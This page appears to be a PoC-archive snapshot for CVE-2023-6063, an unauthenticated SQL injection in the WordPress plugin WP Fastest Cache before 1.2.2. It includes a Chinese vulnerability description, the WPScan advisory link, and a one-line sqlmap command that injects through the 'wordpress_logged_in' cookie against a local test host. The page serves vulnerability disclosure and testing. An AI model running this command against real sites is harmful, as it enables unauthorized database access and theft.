Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-6063 PoC — WordPress plugin WP Fastest Cache 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin WP Fastest Cache 安全漏洞 (CVE-2023-6063)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP Fastest Cache 1.2.2 版本之前存在安全漏洞,该漏洞源于在 SQL 语句中使用参数之前未正确清理和转义参数,从而导致未经身份验证的用户可利用 SQL 注入。
Description
CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)
Readme
# CVE-2023-6063 PoC

## Reference

- [Unauthenticated SQL Injection Vulnerability Addressed in WP Fastest Cache 1.2.2 | WPScan](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)

## Plugin setting

Enable "WP Fastest Cache".

![Image 1](/image_1.png)

## PoC

The "wordpress_logged_in" cookie parameter is vulnerable.

```
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema
```

![Image 2](/image_2.png)
File Snapshot

[4.0K] /data/pocs/af9f4a8f207eb3c5ac65ec5da204d491fe20d906 ├── [263K] image_1.png ├── [157K] image_2.png └── [ 528] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.